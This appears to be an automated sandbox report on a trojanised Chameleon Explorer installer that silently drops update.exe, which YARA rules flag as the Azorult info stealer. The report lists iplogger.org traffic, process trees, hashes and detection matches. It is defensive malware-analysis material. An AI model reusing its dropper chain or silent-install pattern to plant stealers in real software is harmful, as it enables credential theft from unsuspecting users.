                                                                                                                                      Set-Cookie: turnback=info%2Funknown%2F1dHC37%2F; path=/; domain=.iplogger.org; secure; HttpOnly; SameSite=Lax
                                                                                                                                      engine-initialized: 0.0071599483489990234
                                                                                                                                      engine-ended: 0.007217884063720703
                                                                                                                                      engine-errors: 0
                                                                                                                                      engine-finished: 0.007328987121582031
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      2023-02-22 07:08:15 UTC1INData Raw: 35 62 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 c2 a9 20
                                                                                                                                      Data Ascii: 5bdf<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="author" content=""><meta name="copyright" content="Copyright
                                                                                                                                      2023-02-22 07:08:15 UTC16INData Raw: 3e 50 6c 65 61 73 65 20 72 65 61 64 20 6f 75 72 20 75 70 64 61 74 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 72 75 6c 65 73 2f 22 3e 20 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 70 72 69 76 61 63 79 2f 22 3e 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 20 76 65 72 79 20 63 61 72 65 66 75 6c 6c 79 20 61 6e 64 20 64 6f 20 6e 6f 74 20 61 63 63 65 70 74 20 74 68 65 6d 20 69 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 64 6f 75 62 74 73 2e 3c 2f 70 3e 3c 70 3e 3c 62 72
                                                                                                                                      Data Ascii: >Please read our update <a target="_blank" href="https://iplogger.org/rules/"> Terms and Conditions</a> and <a target="_blank" href="https://iplogger.org/privacy/"> Privacy Policy</a> very carefully and do not accept them if you have any doubts.</p><p><br


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.2.349705142.250.184.84443C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      2023-02-22 07:08:32 UTC24OUTGET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-DA23DD2618B7306B8B24495E8B2916C0&vrs=3.0.0.505&prg=explorer&uid=c59b80ec3e93e3d2a7920d213840ce6b HTTP/1.1
                                                                                                                                      User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
                                                                                                                                      Host: neosoft-activator.appspot.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2023-02-22 07:08:35 UTC25INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Type: text/plain;charset=utf-8
                                                                                                                                      X-Cloud-Trace-Context: dcdf721bd21fed5b98e6d1d8ba2ffc49
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:35 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 500
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                      Connection: close
                                                                                                                                      2023-02-22 07:08:35 UTC25INData Raw: 41 63 74 69 76 61 74 69 6f 6e 20 72 65 73 75 6c 74 0d 0a 56 61 6c 69 64 0d 0a 75 79 69 4a 4c 58 6b 69 44 70 2b 56 4b 48 36 34 4a 41 62 78 58 72 76 31 78 6e 4f 6b 4a 76 4d 54 39 45 67 71 41 78 65 34 6c 38 45 78 33 67 55 63 55 54 57 30 47 4c 45 4c 6f 56 45 67 6e 35 5a 77 58 71 7a 54 54 76 61 34 30 51 65 6c 56 77 4a 6e 33 66 6a 45 4d 4c 43 38 76 4a 61 56 44 38 42 50 4d 58 52 45 51 76 51 4f 51 6f 67 53 75 37 59 75 35 54 4f 4e 47 67 64 47 69 44 61 68 69 31 37 35 0d 0a 43 4f 67 74 2b 4b 39 51 74 54 2f 2f 4c 30 43 54 43 48 47 66 31 32 46 6d 6d 69 42 33 4c 39 7a 43 74 71 76 41 48 50 68 57 48 4b 55 30 64 44 53 64 47 6f 56 57 73 48 64 44 6f 56 70 77 57 39 4b 30 78 71 46 64 52 67 4d 6f 49 43 55 57 45 47 5a 58 65 31 34 4a 6b 47 56 46 5a 2b 74 37 58 69 42 78 5a 2f 31
                                                                                                                                      Data Ascii: Activation resultValiduyiJLXkiDp+VKH64JAbxXrv1xnOkJvMT9EgqAxe4l8Ex3gUcUTW0GLELoVEgn5ZwXqzTTva40QelVwJn3fjEMLC8vJaVD8BPMXREQvQOQogSu7Yu5TONGgdGiDahi175COgt+K9QtT//L0CTCHGf12FmmiB3L9zCtqvAHPhWHKU0dDSdGoVWsHdDoVpwW9K0xqFdRgMoICUWEGZXe14JkGVFZ+t7XiBxZ/1


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:08:08:00
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Imagebase:0xdf0000
                                                                                                                                      File size:8148480 bytes
                                                                                                                                      MD5 hash:894FCE964D09231B2B271FBF5AFD4806
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:08:08:11
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:6860752 bytes
                                                                                                                                      MD5 hash:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 2%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:08:08:12
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1185824 bytes
                                                                                                                                      MD5 hash:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:08:08:13
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\update.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:602376 bytes
                                                                                                                                      MD5 hash:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 80%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:08:08:20
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:08:08:39
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:08:08:41
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:08:08:45
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:08:08:47
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:08:08:49
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                                                      Imagebase:0x7ff68f300000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:08:08:50
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:146536 bytes
                                                                                                                                      MD5 hash:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:08:08:50
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline: C:\Users\user\AppData\Roaming\update.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:602376 bytes
                                                                                                                                      MD5 hash:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Azorult_1, Description: Azorult Payload, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:08:08:58
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:08:08:59
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:08:09:06
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:08:09:06
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:08:09:07
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:08:09:16
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:08:09:16
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:08:09:31
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:6.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:21%
                                                                                                                                        Total number of Nodes:167
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 490 df1cbf 491 df1ccf 490->491 493 df1ce7 491->493 495 e10ff6 491->495 494 e2bd01 497 e10ffe 495->497 498 e11018 497->498 500 e1101c std::exception::exception 497->500 503 e1594c 497->503 520 e135e1 DecodePointer 497->520 498->494 522 e187db 500->522 502 e11046 502->494 504 e159c7 503->504 510 e15958 503->510 505 e135e1 _malloc DecodePointer 504->505 506 e159cd 505->506 508 e18d68 _malloc 6 API calls 506->508 519 e159bf 508->519 509 e1598b RtlAllocateHeap 509->510 509->519 510->509 512 e159b3 510->512 513 e135e1 _malloc DecodePointer 510->513 516 e159b1 510->516 525 e1a3ab 510->525 534 e132df 510->534 537 e1a408 510->537 567 e18d68 512->567 513->510 518 e18d68 _malloc 6 API calls 516->518 518->519 519->497 521 e135f4 520->521 521->497 524 e187fa RaiseException 522->524 524->502 570 e25097 525->570 527 e1a3b2 528 e25097 __FF_MSGBANNER 15 API calls 527->528 533 e1a3bf 527->533 528->533 529 e1a408 __NMSG_WRITE 40 API calls 530 e1a3d7 529->530 531 e1a408 __NMSG_WRITE 40 API calls 530->531 532 e1a3e1 531->532 532->510 533->529 533->532 614 e132ab GetModuleHandleExW 534->614 538 e1a426 __NMSG_WRITE 537->538 539 e25097 __FF_MSGBANNER 15 API calls 538->539 566 e1a54d 538->566 542 e1a439 539->542 540 e1c836 __call_reportfault 6 API calls 541 e1a5b6 540->541 541->510 543 e1a552 GetStdHandle 542->543 545 e25097 __FF_MSGBANNER 15 API calls 542->545 544 e1a560 _strlen 543->544 543->566 549 e1a599 WriteFile 544->549 544->566 546 e1a44a 545->546 546->543 547 e1a45c 546->547 547->566 618 e24857 547->618 549->566 551 e1a489 GetModuleFileNameW 553 e1a4a9 551->553 556 e1a4b9 __NMSG_WRITE 551->556 552 e1a5ba 554 e19006 __invoke_watson 8 API calls 552->554 555 e24857 __NMSG_WRITE 15 API calls 553->555 558 e1a5c4 554->558 555->556 556->552 557 e1a4ff 556->557 627 e1d388 556->627 557->552 636 e25c41 557->636 558->510 562 e25c41 __NMSG_WRITE 15 API calls 563 e1a536 562->563 563->552 564 e1a53d 563->564 645 e25ccc EncodePointer 564->645 566->540 670 e19c04 GetLastError 567->670 569 e18d6d 569->516 571 e250a1 570->571 572 e18d68 _malloc 6 API calls 571->572 573 e250ab 571->573 574 e250c7 572->574 573->527 577 e18ff6 574->577 580 e18fcb DecodePointer 577->580 581 e18fde 580->581 586 e19006 IsProcessorFeaturePresent 581->586 584 e18fcb __NMSG_WRITE 8 API calls 585 e19002 584->585 585->527 587 e19011 586->587 592 e18e99 587->592 591 e18ff5 591->584 593 e18eb3 __call_reportfault 592->593 594 e18ed3 IsDebuggerPresent 593->594 600 e1a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 594->600 597 e18fba 599 e1a380 GetCurrentProcess TerminateProcess 597->599 598 e18f97 __call_reportfault 601 e1c836 598->601 599->591 600->598 602 e1c840 IsProcessorFeaturePresent 601->602 603 e1c83e 601->603 605 e25b5a 602->605 603->597 608 e25b09 IsDebuggerPresent 605->608 609 e25b1e __call_reportfault 608->609 610 e1a395 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 609->610 611 e25b26 __call_reportfault 610->611 612 e1a380 ___raise_securityfailure GetCurrentProcess TerminateProcess 611->612 613 e25b43 612->613 613->597 615 e132c4 GetProcAddress 614->615 616 e132db ExitProcess 614->616 615->616 617 e132d6 615->617 617->616 619 e24862 618->619 620 e24870 618->620 619->620 623 e24889 619->623 621 e18d68 _malloc 6 API calls 620->621 626 e2487a 621->626 622 e18ff6 __NMSG_WRITE 9 API calls 624 e1a47c 622->624 623->624 625 e18d68 _malloc 6 API calls 623->625 624->551 624->552 625->626 626->622 631 e1d396 627->631 628 e1d39a 629 e1d39f 628->629 630 e18d68 _malloc 6 API calls 628->630 629->557 632 e1d3ca 630->632 631->628 631->629 634 e1d3d9 631->634 633 e18ff6 __NMSG_WRITE 9 API calls 632->633 633->629 634->629 635 e18d68 _malloc 6 API calls 634->635 635->632 638 e25c4d 636->638 639 e25c5b 636->639 637 e18d68 _malloc 6 API calls 640 e25c65 637->640 638->639 643 e25c87 638->643 639->637 641 e18ff6 __NMSG_WRITE 9 API calls 640->641 642 e1a51f 641->642 642->552 642->562 643->642 644 e18d68 _malloc 6 API calls 643->644 644->640 646 e25d00 ___crtIsPackagedApp 645->646 647 e25dbf IsDebuggerPresent 646->647 648 e25d0f LoadLibraryExW 646->648 651 e25de4 647->651 652 e25dc9 647->652 649 e25d26 GetLastError 648->649 650 e25d4c GetProcAddress 648->650 655 e25d35 LoadLibraryExW 649->655 658 e25ddc 649->658 656 e25d60 7 API calls 650->656 650->658 653 e25dd7 651->653 654 e25de9 DecodePointer 651->654 652->653 657 e25dd0 OutputDebugStringW 652->657 653->658 659 e25e28 653->659 664 e25e10 DecodePointer DecodePointer 653->664 654->658 655->650 655->658 660 e25da8 GetProcAddress EncodePointer 656->660 661 e25dbc 656->661 657->653 662 e1c836 __call_reportfault 6 API calls 658->662 663 e25e60 DecodePointer 659->663 669 e25e4c DecodePointer 659->669 660->661 661->647 665 e25eae 662->665 666 e25e67 663->666 663->669 664->659 665->566 668 e25e78 DecodePointer 666->668 666->669 668->669 669->658 680 e1a007 670->680 672 e19c19 673 e19c67 SetLastError 672->673 683 e18a15 672->683 673->569 677 e19c40 __initptd 678 e19c5e __getptd_noexit 677->678 679 e19c4e GetCurrentThreadId 677->679 678->673 679->673 681 e1a01a 680->681 682 e1a01e TlsGetValue 680->682 681->672 682->672 684 e18a1c 683->684 685 e18a57 684->685 690 e1a372 Sleep 684->690 685->673 687 e1a026 685->687 688 e1a040 TlsSetValue 687->688 689 e1a03c 687->689 688->677 689->677 690->684 691 e1800a 694 e250d7 691->694 693 e1800f 693->693 695 e25107 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 694->695 696 e250fa 694->696 697 e250fe 695->697 696->695 696->697 697->693

                                                                                                                                        Callgraph

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00E10FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E00E10FF6(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
